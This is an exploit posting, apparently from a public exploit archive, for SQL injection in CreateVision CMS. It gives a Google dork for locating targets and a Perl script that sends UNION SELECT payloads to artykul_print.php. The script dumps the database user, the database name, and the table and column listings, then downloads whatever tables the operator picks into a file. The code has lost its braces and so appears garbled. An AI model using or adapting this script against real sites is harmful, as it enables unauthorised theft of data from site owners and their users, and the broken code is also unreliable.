# Exploit Title: CreateVision CMS Database injection.
# Description: Virtually none of the variables are not filtered.
# Google Dork: inurl:artykul_print.php
# Date: 2012/02/24
# Author : Zwierzchowski Oskar
# Software Link: http://www.createvision.pl/
# Version: All Version
# Security Risk: High
# Tested on: FreeBSD
# Greets: Grzegorz Stachowiak, Damian Blaszczyk, Borislav Kotov.
use strict;
use warnings;
use LWP::Simple;
sub main ()
my %config = (
'host' => '',
'columns' => ',3,4',
'column' => '',
'table' => ''
my %send = ();
getcolumn(\%config, \%send);
getuser(\%config, \%send);
getdatabase(\%config, \%send);
gettables(\%config, \%send);
otherdata(\%config, \%send);
return 0;
sub getdatabase ($$)
my $config = shift;
my $send = shift;
my $data;
$data = get $config->{host}.$send->{database};
analizedata($data, 'Database');
return ($config, $send);
sub getuser ($$)
my $config = shift;
my $send = shift;
my $data;
$data = get $config->{host}.$send->{user};
analizedata($data, 'User');
return ($config, $send);
sub gettables ($$)
my $config = shift;
my $send = shift;
my $data;
$data = get $config->{host}.$send->{column};
analizedata($data, 'Tables');
sub otherdata ($$)
my $config = shift;
my $send = shift;
my $data;
my $table;
my $column;
print "[+]\tIf you want to draw some data? (1 or 2)\r\n\r\n";
print "[1]\tYes\r\n";
print "[2]\tNo\r\n";
$data = <STDIN>;
if ($data == 2)
exit 0;
print "[+]\tName of the table which you want to download (check the output.txt) :\r\n";
$table = <STDIN>;
print "[+]\tGet column/s: (ex. column1,column2,column3)\r\n";
$column = <STDIN>;
$column =~ s/,/,char(58),/g;
$send->{tables} = '/artykul_print.php?id=103+and+1=2+union+select+1,concat('.$column.')'.$config->{columns}.'+from+'.$table.'--';
$data = get $config->{host}.$send->{tables};
analizedata($data, 'MYDATA');
return 0;
sub analizedata ($$)
my $data = shift;
my $pref = shift;
my $table;
my $column;
my @columns = ('');
my @tables = ('');
while ($data =~ /<span class=\"tytul_artykulu\">(.*?)<\/span>/g)
if ($pref eq 'Tables')
($table, $column) = split(/:/, $1);
save($1, 'output.txt');
push(@columns, $column);
if ($table eq $tables[$#tables])
push(@tables, $table);
print "[+]\t[".$pref."][".$1."]\r\n";
save($1, 'output.txt');
if ($pref eq 'Tables')
print "[+]\t".$#columns." columns in ".$#tables." tables\r\n";
print "[+]\tResults has been saved into output.txt\r\n";
return 0;
sub getops ($)
my $config = shift;
if (!$ARGV[0] || $ARGV[0] !~ /http:\/\//)
print "[+]\tUsage: perl splo.pl http://host.com\r\n";
exit 0;
$config->{host} = $ARGV[0];
return $config;
sub getcolumn ($$)
my $config = shift;
my $send = shift;
my $data;
for (1..20)
$send->{user} = '/artykul_print.php?id=105+and+1=2+union+select+1,user()'.$config->{columns}.'--';
$send->{database} = '/artykul_print.php?id=105+and+1=2+union+select+1,database()'.$config->{columns}.'--';
$send->{column} = '/artykul_print.php?id=105+and+1=2+union+select+1,concat(table_name,char(58),column_name)'.$config->{columns}.'+from+information_schema.columns--';
$data = get $config->{host}.$send->{user};
if (index($data, "<span class=\"tytul_artykulu\">") != -1)
return ($config, $send);
return $config;
sub incrcolum ($)
my $config = shift;
my @digits = split(/,/, $config->{columns});
my $data = (($digits[$#digits])+1);
$config->{columns} =~ s/$config->{columns}/$config->{columns},$data/g;
return $config;
sub save ($$)
my $data = shift;
my $file = shift;
open(FILE, ">>".$file."");
print FILE "".$data."\r\n";
close FILE;
return 0;